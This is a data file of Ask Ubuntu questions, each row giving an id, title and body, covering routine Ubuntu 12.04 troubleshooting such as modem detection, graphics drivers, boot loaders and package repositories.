139878	ubuntu 12.04 ca n't detect internal mobile broadband ( gobi 2000 )	hi i have been trying ubuntu to detect and connect using the buit in mobile broadband capability in my hp 110 netbook but until now nothing seems to work output of lspci command : 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 02 ) 00:1f.2 sata controller : intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ahci mode ] ( rev 02 ) 01:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) 02:00.0 ethernet controller : atheros communications inc. ar8132 fast ethernet ( rev c0 ) output of lsusb command : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 1fea:0008 bus 005 device 002 : id 03f0:2a1d hewlett-packard bus 001 device 005 : id 03f0:241d hewlett-packard gobi 2000 wireless modem ( qdl mode ) so far i have been trying what is intended on several pages , trying to update firmware using wine and then moving .mda or whatever files the update package gobiinstaller.mdi throws out . the results are always the same : after running output of wine msiexec /a gobiinstaller.msi /qb targetdir= '' c : \temp '' : fixme : advapi : getcurrenthwprofilea ( 0x33fba8 ) semi-stub fixme : heap : heapsetinformation ( nil ) 1 ( nil ) 0 fixme : win : registerdevicenotificationa ( hwnd=0x13e250 , filter=0xf7e984 , flags=0x00000001 ) returns a fake device notification handle ! fixme : heap : heapsetinformation ( nil ) 1 ( nil ) 0 fixme : heap : heapsetinformation ( nil ) 1 ( nil ) 0 fixme : advapi : registereventsourcew ( ( null ) , l '' bonjour service '' ) : stub fixme : advapi : reporteventa ( 0xcafe4242,0x0004,0x0000,0x00000064 , ( nil ) ,0x0001,0x00000000,0x79e58c , ( nil ) ) : stub fixme : advapi : reporteventw ( 0xcafe4242,0x0004,0x0000,0x00000064 , ( nil ) ,0x0001,0x00000000,0x12e6d0 , ( nil ) ) : stub fixme : winsock : wsaioctl ws_sio_udp_connreset stub fixme : winsock : wsaioctl - > sio_address_list_change request : stub fixme : iphlpapi : deleteipforwardentry ( proute 0x79e920 ) : stub fixme : iphlpapi : createipforwardentry ( proute 0x79e958 ) : stub fixme : advapi : reporteventa ( 0xcafe4242,0x0004,0x0000,0x00000064 , ( nil ) ,0x0001,0x00000000,0x79e58c , ( nil ) ) : stub fixme : advapi : reporteventw ( 0xcafe4242,0x0004,0x0000,0x00000064 , ( nil ) ,0x0001,0x00000000,0x12e6d0 , ( nil ) ) : stub fixme : service : enumservicesstatusw resume handle not supported fixme : service : enumservicesstatusw resume handle not supported fixme : advapi : reporteventa ( 0xcafe4242,0x0004,0x0000,0x00000064 , ( nil ) ,0x0001,0x00000000,0x79e58c , ( nil ) ) : stub fixme : advapi : reporteventw ( 0xcafe4242,0x0004,0x0000,0x00000064 , ( nil ) ,0x0001,0x00000000,0x12e6d0 , ( nil ) ) : stub fixme : netapi32 : netgetjoininformation semi-stub ( null ) 0x79e644 0x79e63c fixme : winsock : wsaioctl ws_sio_udp_connreset stub fixme : storage : create_storagefile storage share mode not implemented . err : msi : iterate_actions execution halted , action l '' _693cd41c_a4a2_4fa1_8888_fc56c9e6e13b '' returned 1603 err : rpc : i_rpcgetbuffer no binding err : rpc : i_rpcgetbuffer no binding andres @ andres-hp-mini-110-1100 : ~/.wine/drive_c/qualcomm $ fixme : advapi : reporteventa ( 0xcafe4242,0x0004,0x0000,0x00000064 , ( nil ) ,0x0001,0x00000000,0x79e588 , ( nil ) ) : stub fixme : advapi : reporteventw ( 0xcafe4242,0x0004,0x0000,0x00000064 , ( nil ) ,0x0001,0x00000000,0x12e6d0 , ( nil ) ) : stub and creates 2 empty folders , i have been trying hard and i am not sure if i am doing it the way it should be .
139879	12.04 apt-get update taking long time . how to speed up ?	sudo apt-get update is taking long time for following sites : get:17 http : //archive.ubuntu.com precise/restricted sources [ 5,470 b ] get:18 http : //archive.ubuntu.com precise/universe sources [ 5,019 kb ] ... get:21 http : //archive.ubuntu.com precise/restricted i386 packages [ 8,431 b ] get:22 http : //archive.ubuntu.com precise/universe i386 packages [ 4,796 kb ] anyway to speed up this ? internet connection is good .
139885	how do you add something to the unity launcher that only appears in the dash ? ( such as chrome web app shortcuts )	i use google chrome/chromium 's create shortcut feature and when i opted to make the shortcut , i chose to not make a desktop icon and have it only appear in the dash . however , i want to lock it to the launcher as a separate app from google chrome but when i click to open the app it opens under the normal google chrome icon on the unity launcher so i ca n't pin it that way . i think if i had a desktop shortcut , i could just drag it onto the launcher ? a solution to this would to allow right-clicking in the dash in the next release of ubuntu so you can right-click and say `` lock to launcher '' . but till then i need a solution !
139887	how to 'link ' two music directories when dual booting windows 7 & ubuntu 12.04 ?	i 'm dual booting win7 and 12.04 and i want to link my two music folders together . basically i want the contents of my win7 music directory to appear in my ubuntu music directory .
139890	do n't show removable media in the launcher ?	is it possible to disable or remove the icons for removable media , such as dvd drives or external hard drives , from the launcher in 12.04 ?
139896	install deluge daemon through apt-get only ?	okay so here is where i 'm at , i have already run this : sudo apt-get install deluged deluge-webui and when i typed in deluged it starting running the dameon i guess my question is where do i go from here ? how do i get the web-ui running and how can i make sure they all start when the entire server is restarted ?
139905	iptv ub310-dvbt driver for ubuntu	i have digital usb tv tuner iptv ub310-dvbt . how can i connect this device to ubuntu 12.04 ? this device not listed in linuxtv
139909	equivalent of http : //packages.ubuntu.com for partner , security and extras repositories	http : //packages.ubuntu.com is an amazing website for finding information about packages . i can see how a given package evolved in each release , can compare differences ( from maverick to precise , for example ) , download other releases 's versions to study or even backport them , etc . it has links to the debian equivalent , launchpad , etc . it 's an amazing cross-release package control panel . i even added its search to my firefox custom searches . so , the question is : is there any similar website for the partners repository ? ... and what about security ? and extras ? my google skills may be rusty , but i could n't find it . thanks !
139913	graphics cards that work well with ubuntu ?	i 've recently embarked on a pc building project , i 've got some of the components sorted out ( well , the cpu ! ) and i 'm trying to look for a graphics card to buy . i 've been spending the past hour or so trawling reviews , specs , and prices for various different graphics cards . . . and to be honest i could probably do this all day without coming to a good conclusion ! the problem is , the cpu i 've decided on is an amd cpu , as far as i know this restricts me to amd graphics ( please correct me if i 'm wrong here ) so i 've been looking at amd graphics cards , i 've found various cards that seem like what i want , but i 'm having real difficulty trying to ascertain whether or not they 're compatible with linux . wherever i go i seem to get conflicting information , all i can really conclude is that intel has good driver support for linux . however as far as i know , their cards are a little underpowered , and i 'd also need an intel motherboard and cpu for that to work ? a lot of places also seem to say that amd support for linux is n't nearly as good as it could be ? does anybody know of any good linux compatible amd graphics cards that i can buy ? or should i rethink and go for an intel/nvidia card ? i 'm not looking for anything very flashy , just something that plays hd video and could handle simple games like minecraft to a decent degree . i also browsed around here a little too , apparently this is a good card for ubuntu ? although searching online people complain of problem with that card and ubuntu ? this is so confusing ! ! ! hope there are n't too many question marks there ! edit : not sure if this is relevant for drivers , but i 'm also looking for a dual monitor setup - does that impact this in any way ?
139914	how do i install realplayer ?	i am trying to install realplayer ? does anyone know how i can successfully achieve this ?
139919	`` no space left '' during upgrade	i 'm in the process of running the 12.04 upgrade ( kubuntu ) . my root partition is a bit small , but i cleared as much as i could after the upgrade told me it needed more space . during `` installing the upgrades '' it was doing something with 'nvidia_current ' and ran out of space writing /lib/modules/3.2.0-24-generic/updates/dkms/nvidia_current.ko i have cleared some more space by deleting old logs , but the upgrade process sits there adding more dots to a long line . there is about 180mb free now , which seems to be going down slowly . will it ever continue or will a reboot continue the upgrade ?
139932	line 6 gx only works if i play during startup	summary : i ca n't get any sound to play or record through my line 6 studio gx audio interface , unless i play ( my guitar ) whilst boot . detail : if i play my guitar while the system is booting , it 'll keep working . if i do n't play ( but still have everything plugged in ) it wo n't work . 9/10 times this rule applies , however sometimes it does n't work no matter what i do . i have not fiddled with the configuration of the audio system at all , so it 's all vanilla . i know the line 6 drivers are working , the little led on top of the device is lit up green and the device is listed in ubuntu . question : what 's wrong ? how can i fix this so i can start recording guitar ? system : ubuntu desktop 11.10 x64
139934	change boot loader order	i use windows as primary system . last week , i installed newest ubuntu , and i always accidentally boot in to ubuntu when i want to boot into windows . is there any way to change the order of this boot loader ?
139935	reinstall previous version on dual boot system	so , i tried to upgrade from 11.10 to 12.04 on a dual boot system but ubuntu will not load . i then tried to boot from a usb stick with `` start-up disc creator '' and a 12.04 iso image ( bios set to boot from usb first ) but computer just goes to grub menu . i actually dislike unity soooo much that i would like to just put 10.10 back in anyway ( started with this and have a good cd of it ) . my dislike of unity is because the unity launcher is driving me crazy ! anytime i get near the `` back '' button in firefox that damn launcher pops up ! it 's like a mosquito in a tent ! i 've got a 6.3g ntfs and 108g ntfs partion and then a 20g ext4 partion where i believe the ubuntu operating system lives . there is also a 346g ext4 ( i believe this is /home ) and a 20g swap partition . if i boot from the 10.10 cd , i can install from it ? but do i format the 20g partition or what ? what about the grub2 loader ? i do n't know why i even tried to upgrade other than the other upgrades worked.i liked 10.10 better and all i want is internet , music and photos.i did manage to back up my files to another usb stick . help .
139938	new install using a wireless keyboard and mouse	this is a very basic question but i do not know the answer . i am building a new pc from scratch and wondered if the ubuntu installer will recognize a wireless keyboard and mouse during the installation . thank you very much ! mariano
139943	hangs after login in my dell laptop	this is my first experience with ubuntu .i have installed the os yesterday with windows 7 and the os was working well but subsequent using the os i felt that it was hanging frequently and i had no other option but to reboot the lappy . iam using dell inspiron lap .
139945	change text field editing in gnome 3 to use control and meta keys like emacs or bash	a while ago i did this on my mac and i was able to use emacs controls in all cocoa text widgets . i 'm a big emacs user and it 's really been great to do such lightning fast editing in email and web text widgets . i did that by adding some key macros to a file . is there any way to do this in gnome ? i 'd really like to be able to use c-n-p-f-b-a-e and m-f-b . m- > and m- < would be a plus too . i do n't really know much about gnome , but i figured there might be a way to do this .
139947	why ca n't ubuntu 12.04 detect my screen resolution ?	i tried using ubuntu 12.04 lts using a usb stick , but the desktop resolution is really low - every icon and piece of text looks pixelated . i have a `viewsonic vs10866 monitor : 19 '' lcd display , 16:10 aspect ratio , 300-nit brightness , 500:1 contrast ratio` . how do i fix this resolution problem ? the last time i used ubuntu , it was version 10.04 which worked perfectly fine . so what 's wrong now ? i currently only have windows on my machine , which i plan to run along with 12.04 .
139951	how do i install ubuntu 12.04 inside windows 7	installing ubuntu inside windows 7 is not an option available for my system i guess . i dont have a previous version installed on my machine as it was giving me problems regarding the grub with dual boot . is it because my machine is 64-bit ? any solution so that i dont have to restructure my hdd or format the whole laptop altogether ? ram is 3gb only so i cant run it on vmware etc too gives a hard time that way . i only need it for shell scripting and c/c++/java coding
139953	acer travelmate 8371 does n't charge battery since ubuntu 12.04	since the update to 12.04 my battery wo n't charge - it says it 's charged to 51 % - when i disconnect the powercable thee is no energy supply at all . how can i figure out if it 's a hardware problem or the new ubuntuversion ? and how can i fix it ?
139955	why do i have such slow experience in web browsing on ubuntu ?	i have a relatively recent laptop with decent hardware and on windows web browsing is pretty good , but when on ubuntu , it gets so slow , i ca n't watch properly a video from youtube or even low quality videos from elsewhere , which lag all the time . also images take more time to load . i 've tried everything , my firefox has adblock plus , flashblock , i use flashgot to download videos and watch them on a player but i ca n't be downloading several mb long videos all the time . i 've tried chromium , firefox and opera , opera is the one that allows me to have more tabs open without freezing , however flash problems remain . chromium crashes all the time with the `` aww snap '' page . on an older pc i have with lubuntu , it 's even worse , i ca n't open a window with a video because it will freeze the system entirely until it loads , i often have to go to windows xp if i want to browse decently . what can i do to have a better web experience ?
139957	read pdf document properties from terminal as seen in nautilus	from the terminal i would like to be access the data that is readable when right clicking on a pdf file and selecting `` document '' . example i have tried reading metadata with tools such as mminfo and pdftk but some files are password protected so they ca n't show me the meta data . help appreciated .
139958	me tv under ubuntu 12.04	is anybody successfully running me tv ( me-tv ) on current ubuntu 12.04 ( 64bit ) ? if yes , which version of me tv ?
139959	why is my background image always disappearing when i log in ?	when logging in lubuntu 12.04 , my background image always disappears , leaving the screen with color only and then i have to go to definitions and set the image in the background again . i notice that this does not happen with low-resolution images , only with high ones , but also happens with images that fit my screen resolution ( 1280 x 720 ) . any ideas on how to fix this ? the image remains at it 's location , but on the desktop preferences , the pathway to the file location is lost and set to none .
139961	missing certain packages	after i log in my menu that contains my : system , admimistration , update manager , etc ; has disappeared , do you know what happened here . i really need this package especially for my updates . can you help me ?
139963	cross compile packages , question regarding armhf dependencies	i 'm attempting to cross compile a couple ubuntu precise packages , my current arch is amd64 my target is armhf . i have the correct cross compile gcc toolchain installed , i have correctly utilized the toolchain to previously compile the kernel . i was wondering about the package build dependencies , does the build just get its includes from my regular dev packages ? do i need to do anything special ? i execute this command , this time adding the arch dpkg-buildpackage -rfakeroot -aarmhf near the end of the build , i get this ... file format not recognized ... make : *** [ binary ] error 29 dpkg-buildpackage : error : fakeroot debian/rules binary gave error exit status 2
139965	how do i get a canon pixma mx350 printer working ?	is anybody successfully addressing a canon pixma mx printer ( mx350 in my case ) on current ubuntu 12.04 ( 64bit ) ?
139966	how can i add an entry for ubuntu to the windows 7 boot menu ?	i have the following setup : first partition is windows 7 partition second partition - ubuntu 12.04 partition while installing ubuntu i installed grub2 bootloader to ubuntu partition mbr contains windows bootloader i have tried using easybcd to add entry to windows boot menu , with no luck - this entry just boots into grub4dos command prompt how to add ubuntu to windows boot menu ? please do not suggest installing grub2 to mbr or wubi.. update : i followed the instructions to install easybcd and add an entry to windows boot menu to boot ubuntu step by step . when i reboot both the neogrub bootloader and the ubuntu menu items take me to the screen below .
139976	ubuntu gives `` incorrect password '' warning	every since i upgraded to ubuntu 12.04 , i keep getting an error message saying , `` incorrect password '' . i 've never changed my password since starting to use ubuntu . how can i fix this ?
139979	dual boot ubuntu 12.04 and mageia	i am new to linux , and i am currently using ubuntu 12.04 . i would like to set up a dual-boot of mageia 2 and ubuntu . should i install mageia first so when i install ubuntu i can use grub2 ? will it automatically set up boot options for mageia ? also , is there currently a fix for the nvidia driver ? i am using the nvidia 6150se card ( nforce 430 chipset ) , and the current driver does not work .
139983	ubuntu 12.04 and nvidia woes	so i know this has been posted a few times , i have searched and tried options but i can not for the life of me figure out how to install my video card drivers . where i stand now : fresh install of 12.04 with default nouveau drivers what i have : gf nvidia 8500gt ( amd ) / 2x 23 inch monitors . one is rotated landscape* using nouveau i get weird issues like screen breaks . i have tried installing the additional drivers before , it just makes my system hang at boot . i have also disabled the nouveau driver . this got me into unity , but i could not see my 2nd monitor . displays said i had 1 single monitor with a huge resolution . i then tried to set my monitor with nvidia-config , this worked however i cant rotate in twinview . i tried to setup xinemama and that just broke everything , it was saying i had 4 monitors and 2 devices . just all kinds of bad . so what im looking for is , which driver should i be using ? i see people using nouveau , nvidia ( additional drivers ) , nvidia ( from their site ) , x-swat drivers , and bumblebee . i think once i figure out exactly which solution is best for me , i can better understand how to install and setup my drivers .
139985	what 's the name of the program/app/daemon that `` plays '' music in rhythmbox when i try to quit it with close button ?	i 'm using ubuntu 12.04 with gnome-shell and `` mediaplayer-extension '' from https : //extensions.gnome.org/extension/55/ . when i hit the close button on a music player , like rhythmbox 2.9x , it hides somewhere , but it keeps playing music in the background . but if i try to do the same on another distro , when i hit the close button , rhythmbox quits instantly . the question is : what 's the program/app/daemon 's name that `` plays '' music in background even if i try to quit rhythmbox ( or any music player without a tray-icon ) with `` close '' button ? if i try to remove that program , will rhythmbox ( or any music player ) quit on `` close '' button ? ( because i need that ) i know it is n't `` mediaplayer-extension '' nor `` rhythmbox-client '' , but i ca n't identify the program . can somebody help me ? thanks . ( my native language is n't english so i do n't know if it 's well drafted . ) edit for clarification , what i 'm wondering is : why does rhythmbox hide on ubuntu by hitting on `` close '' button instead of quitting it ? why does rhythmbox quit on fedora by hitting on `` close '' button instead of hiding it ? is there a program that modifies rhythmbox 's behaviour in ubuntu that fedora does n't have , or viceversa ? edit 2 it does n't only happen in rhythmbox . if i use another music player , like quodlibet or banshee ( both without tray icon ) , it keeps playing music on ubuntu , but quits instantly on fedora when i hit on the same `` close '' button . is that ( hide-on-close ) a normal behaviour that i can only find on ubuntu ?
139988	thunderbird 12.0.1 does n't recognize any of my emails on ubuntu 12.04 x86_64	i 'm trying to set my emails on thunderbird but i keep getting the same error message : thunderbird failed to find the settings for your email account . i saw another thread of two people with the same problem but i could n't find the solution to this problem . i 'm sure i 'm writing my profiles correctly .
139994	installing lenses and scopes in ubuntu 12.04 error	when i am going to download a lens or scope in terminal using the codes from http : //www.noobslab.com/2012/01/install-important-lenses-in-ubuntu.html my computer says could not locate package i want contacts lens tomboy lens youtube lens books lens and grooveshark lens this is what comes in the terminal : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package unity-lens-books i have copied the codes in – harris rubin yesterday and these were the results – harris rubin yesterday harris @ harris-hp-pavilion-dv6000-rp296ua-aba : ~ $ sudo add-apt-repository ppa : jsevi83/unity [ sudo ] password for harris : you are about to add the following ppa to your system : tag : launchpad.net:2008 : redacted more info : launchpad.net/~jsevi83/+archive/unity press [ enter ] to continue or ctrl-c to cancel adding it – harris rubin yesterday executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret-keyring /tmp/tmp.4fgf1cnihn -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyring /etc/apt/trusted.gpg.d//jockey-drivers.gpg -- keyserver hkp : //keyserver.ubuntu.com:80/ -- recv tag : launchpad.net:2008 : redacted gpg : `` tag : launchpad.net:2008 : redacted '' not a key id : skipping harris @ harris-hp-pavilion-dv6000-rp296ua-aba : ~ $ sudo add-apt-repository ppa : atareao/lenses – harris rubin yesterday you are about to add the following ppa to your system : a ppa for new lenses made for atareao-team more info : launchpad.net/~atareao/+archive/lenses press [ enter ] to continue or ctrl-c to cancel adding it – harris rubin yesterday executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret-keyring /tmp/tmp.oiifmh4lc6 -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyring /etc/apt/trusted.gpg.d//jockey-drivers.gpg -- keyserver hkp : //keyserver.ubuntu.com:80/ -- recv a3d8a366869fe2dc5ffd79c36a9653f936fd5529 gpg : requesting key 36fd5529 from hkp server keyserver.ubuntu.com gpg : key 36fd5529 : public key `` launchpad ppa for atareao '' imported – harris rubin yesterday gpg : total number processed : 1 gpg : imported : 1 ( rsa : 1 ) harris @ harris-hp-pavilion-dv6000-rp296ua-aba : ~ $ sudo apt-get update ign dl.google.com testing inrelease get:1 dl.google.com testing release.gpg [ 189 b ] get:2 dl.google.com testing release [ 2,513 b ] ign security.ubuntu.com precise-security inrelease ign ppa.launchpad.net precise inrelease ign ppa.launchpad.net precise inrelease – harris rubin yesterday ign ppa.launchpad.net precise inrelease ign ppa.launchpad.net precise inrelease ign us.archive.ubuntu.com precise inrelease ign us.archive.ubuntu.com precise-updates inrelease – harris rubin yesterday ign us.archive.ubuntu.com precise-backports inrelease get:3 dl.google.com testing/non-free i386 packages [ 793 b ] ign download.ebz.epson.net lsb3.2 inrelease get:4 security.ubuntu.com precise-security release.gpg [ 198 b ] ign ppa.launchpad.net precise inrelease – harris rubin yesterday ign ppa.launchpad.net precise inrelease ign ppa.launchpad.net precise inrelease ign ppa.launchpad.net precise inrelease ign ppa.launchpad.net precise inrelease ign dl.google.com testing/non-free translationindex hit ppa.launchpad.net precise release.gpg get:5 us.archive.ubuntu.com precise release.gpg [ 198 b ] – harris rubin yesterday hit download.ebz.epson.net lsb3.2 release.gpg get:6 security.ubuntu.com precise-security release [ 49.6 kb ] get:7 ppa.launchpad.net precise release.gpg [ 316 b ] hit ppa.launchpad.net precise release.gpg ign ppa.launchpad.net precise release.gpg hit ppa.launchpad.net precise release.gpg hit ppa.launchpad.net precise release.gpg – harris rubin yesterday get:5 us.archive.ubuntu.com precise release.gpg [ 198 b ] hit download.ebz.epson.net lsb3.2 release.gpg get:6 security.ubuntu.com precise-security release [ 49.6 kb ] get:7 ppa.launchpad.net precise release.gpg [ 316 b ] hit ppa.launchpad.net precise release.gpg ign ppa.launchpad.net precise release.gpg hit ppa.launchpad.net precise release.gpg – harris rubin yesterday hit ppa.launchpad.net precise release.gpg ign ppa.launchpad.net precise release.gpg get:8 us.archive.ubuntu.com precise-updates release.gpg [ 198 b ] hit download.ebz.epson.net lsb3.2 release hit ppa.launchpad.net precise release.gpg – harris rubin yesterday hit ppa.launchpad.net precise release get:9 ppa.launchpad.net precise release [ 11.9 kb ] get:10 us.archive.ubuntu.com precise-backports release.gpg [ 198 b ] ign dl.google.com testing/non-free translation-en_us hit download.ebz.epson.net lsb3.2/main i386 packages hit ppa.launchpad.net precise release ign ppa.launchpad.net precise release – harris rubin yesterday hit ppa.launchpad.net precise release ign ppa.launchpad.net precise release hit ppa.launchpad.net precise release hit ppa.launchpad.net precise release get:11 us.archive.ubuntu.com precise release [ 49.6 kb ] – harris rubin yesterday ign dl.google.com testing/non-free translation-en ign download.ebz.epson.net lsb3.2/main translationindex ign ppa.launchpad.net precise release hit ppa.launchpad.net precise release hit ppa.launchpad.net precise/main sources hit ppa.launchpad.net precise/main i386 packages ign ppa.launchpad.net precise/main translationindex – harris rubin yesterday ign ppa.launchpad.net precise/main translationindex get:12 security.ubuntu.com precise-security/main sources [ 8,976 b ] get:13 ppa.launchpad.net precise/main sources [ 1,524 b ] get:14 ppa.launchpad.net precise/main i386 packages [ 1,089 b ] ign ppa.launchpad.net precise/main translationindex hit ppa.launchpad.net precise/main sources – harris rubin yesterday hit ppa.launchpad.net precise/main i386 packages get:15 security.ubuntu.com precise-security/restricted sources [ 14 b ] get:16 security.ubuntu.com precise-security/universe sources [ 4,063 b ] get:17 us.archive.ubuntu.com precise-updates release [ 49.6 kb ] ign ppa.launchpad.net precise/main translationindex hit ppa.launchpad.net precise/main sources hit ppa.launchpad.net precise/main i386 packages – harris rubin yesterday ign ppa.launchpad.net precise/main translationindex hit ppa.launchpad.net precise/main sources get:18 security.ubuntu.com precise-security/multiverse sources [ 696 b ] get:19 security.ubuntu.com precise-security/main i386 packages [ 35.0 kb ] get:20 us.archive.ubuntu.com precise-backports release [ 49.6 kb ] hit ppa.launchpad.net precise/main i386 packages – harris rubin yesterday ign ppa.launchpad.net precise/main translationindex ign ppa.launchpad.net precise/main translationindex get:21 us.archive.ubuntu.com precise/main sources [ 934 kb ] hit ppa.launchpad.net precise/main sources hit ppa.launchpad.net precise/main i386 packages ign ppa.launchpad.net precise/main translationindex get:22 security.ubuntu.com precise-security/restricted i386 packages [ 14 b ] – harris rubin yesterday ign ppa.launchpad.net precise/main translationindex ign ppa.launchpad.net precise/main translationindex get:21 us.archive.ubuntu.com precise/main sources [ 934 kb ] hit ppa.launchpad.net precise/main sources hit ppa.launchpad.net precise/main i386 packages ign ppa.launchpad.net precise/main translationindex get:22 security.ubuntu.com precise-security/restricted i386 packages [ 14 b ] – harris rubin yesterday hit security.ubuntu.com precise-security/main translation-en hit security.ubuntu.com precise-security/multiverse translation-en hit security.ubuntu.com precise-security/restricted translation-en hit security.ubuntu.com precise-security/universe translation-en ign download.ebz.epson.net lsb3.2/main translation-en_us ign download.ebz.epson.net lsb3.2/main translation-en get:25 us.archive.ubuntu.com precise/restricted sources [ 5,470 b ] – harris rubin yesterday get:26 us.archive.ubuntu.com precise/universe sources [ 5,019 kb ] err ppa.launchpad.net precise/main sources 404 not found err ppa.launchpad.net precise/main i386 packages 404 not found err ppa.launchpad.net precise/main sources 404 not found err ppa.launchpad.net precise/main i386 packages 404 not found – harris rubin yesterday ign ppa.launchpad.net precise/main translation-en_us ign ppa.launchpad.net precise/main translation-en ign ppa.launchpad.net precise/main translation-en_us ign ppa.launchpad.net precise/main translation-en ign ppa.launchpad.net precise/main translation-en_us ign ppa.launchpad.net precise/main translation-en ign ppa.launchpad.net precise/main translation-en_us ign ppa.launchpad.net precise/main translation-en – harris rubin yesterday ign ppa.launchpad.net precise/main translation-en_us ign ppa.launchpad.net precise/main translation-en ign ppa.launchpad.net precise/main translation-en_us ign ppa.launchpad.net precise/main translation-en ign ppa.launchpad.net precise/main translation-en_us ign ppa.launchpad.net precise/main translation-en ign ppa.launchpad.net precise/main translation-en_us ign ppa.launchpad.net precise/main translation-en – harris rubin yesterday get:27 us.archive.ubuntu.com precise/multiverse sources [ 155 kb ] get:28 us.archive.ubuntu.com precise/main i386 packages [ 1,274 kb ] get:29 us.archive.ubuntu.com precise/restricted i386 packages [ 8,431 b ] get:30 us.archive.ubuntu.com precise/universe i386 packages [ 4,796 kb ] get:31 us.archive.ubuntu.com precise/multiverse i386 packages [ 121 kb ] hit us.archive.ubuntu.com precise/main translationindex hit us.archive.ubuntu.com precise/multiverse translationindex – harris rubin yesterday hit us.archive.ubuntu.com precise/restricted translationindex hit us.archive.ubuntu.com precise/universe translationindex get:32 us.archive.ubuntu.com precise-updates/main sources [ 41.7 kb ] get:33 us.archive.ubuntu.com precise-updates/restricted sources [ 1,379 b ] get:34 us.archive.ubuntu.com precise-updates/universe sources [ 12.3 kb ] get:35 us.archive.ubuntu.com precise-updates/multiverse s – harris rubin yesterday get:36 us.archive.ubuntu.com precise-updates/main i386 packages [ 112 kb ] get:37 us.archive.ubuntu.com precise-updates/restricted i386 packages [ 2,439 b ] get:38 us.archive.ubuntu.com precise-updates/universe i386 packages [ 34.4 kb ] get:39 us.archive.ubuntu.com precise-updates/multiverse i386 packages [ 1,393 b ] get:40 us.archive.ubuntu.com precise-updates/main translationindex [ 73 b ] get:41 us.archive.ubuntu.com precise-updates/multiverse translationindex [ 71 b ] – harris rubin yesterday get:43 us.archive.ubuntu.com precise-updates/universe translationindex [ 73 b ] get:44 us.archive.ubuntu.com precise-backports/main sources [ 700 b ] get:45 us.archive.ubuntu.com precise-backports/restricted sources [ 14 b ] get:46 us.archive.ubuntu.com precise-backports/universe sources [ 2,696 b ] get:47 us.archive.ubuntu.com precise-backports/multiverse sources [ 14 b ] get:48 us.archive.ubuntu.com precise-backports/main i386 packages [ 559 b ] get:49 us.archive.ubuntu.com precise-backports/restricted i386 packages [ 14 b ] – harris rubin yesterday get:50 us.archive.ubuntu.com precise-backports/universe i386 packages [ 2,379 b ] get:51 us.archive.ubuntu.com precise-backports/multiverse i386 packages [ 14 b ] – harris rubin yesterday hit us.archive.ubuntu.com precise-backports/main translationindex hit us.archive.ubuntu.com precise-backports/multiverse translationindex hit us.archive.ubuntu.com precise-backports/restricted translationindex hit us.archive.ubuntu.com precise-backports/universe translationindex hit us.archive.ubuntu.com precise/main translation-en – harris rubin yesterday hit us.archive.ubuntu.com precise/multiverse translation-en hit us.archive.ubuntu.com precise/restricted translation-en hit us.archive.ubuntu.com precise/universe translation-en get:52 us.archive.ubuntu.com precise-updates/main translation-en [ 53.7 kb ] – harris rubin yesterday hit us.archive.ubuntu.com precise-updates/multiverse translation-en hit us.archive.ubuntu.com precise-updates/restricted translation-en get:53 us.archive.ubuntu.com precise-updates/universe translation-en [ 21.4 kb ] – harris rubin yesterday hit us.archive.ubuntu.com precise-backports/main translation-en hit us.archive.ubuntu.com precise-backports/multiverse translation-en hit us.archive.ubuntu.com precise-backports/restricted translation-en hit us.archive.ubuntu.com precise-backports/universe translation-en fetched 12.9 mb in 38s ( 335 kb/s ) – harris rubin yesterday w : failed to fetch ppa.launchpad.net/jsevi83/unity/ubuntu/dists/precise/main/… 404 not found w : failed to fetch ppa.launchpad.net/jsevi83/unity/ubuntu/dists/precise/main/… 404 not found – harris rubin yesterday w : failed to fetch ppa.launchpad.net/remi.rerolle/unity-lens-tomboy/ubuntu/dists/… 404 not found w : failed to fetch ppa.launchpad.net/remi.rerolle/unity-lens-tomboy/ubuntu/dists/… 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
139996	ubuntu 12.04 despite the left panel poli tray present , myunity says that unity turns in 2d	how do i enable unity 3d ? i state that i have used the correct login to ubuntu to ubuntu and not 2d below the glxinfo stefano @ worklinux : ~ $ glxinfo | grep render nvfx_screen_get_param:95 - warning : unknown pipe_cap 30 nvfx_screen_get_param:95 - warning : unknown pipe_cap 30 nvfx_screen_get_param:95 - warning : unknown pipe_cap 55 nvfx_screen_get_param:95 - warning : unknown pipe_cap 56 nvfx_screen_get_param:95 - warning : unknown pipe_cap 59 nvfx_screen_get_param:95 - warning : unknown pipe_cap 58 nvfx_screen_get_param:95 - warning : unknown pipe_cap 30 direct rendering : yes opengl renderer string : gallium 0.4 on nv34
140001	java applet not working	i cant use any java applets . i installed icedtea-7-plugin , and it is even activated under add-ons , but if i for example click : www.java.com/de/download/testjava.jsp the test-screen remains grey . i definitely have a jre installed -- openjdk-7-jre and icedtea-7-plugin are both installed . the output of java -version is : java version `` 1.6.0_24 '' openjdk runtime enviroment ( icedtea6 1.11.1 ) ( 6b24-1.11.1-4ubuntu3 ) openjdk 64-bit server vm ( build 20.0-b12 , mixed mode )
140002	brightness keys in dell n4010 ( 14r ) causing freezes	the brightness keys on my dell n4010 with ubuntu 12.04 is causing ubuntu to freeze on a black screen if i press the brightup and brightdown key ( s ) 3-4 times . i think this is a bug which was noticed in 10.04 and was patched , but its giving problem in 12.04 again to me . i tried remapping and disabling the brightness keys but it did not work out . please help .
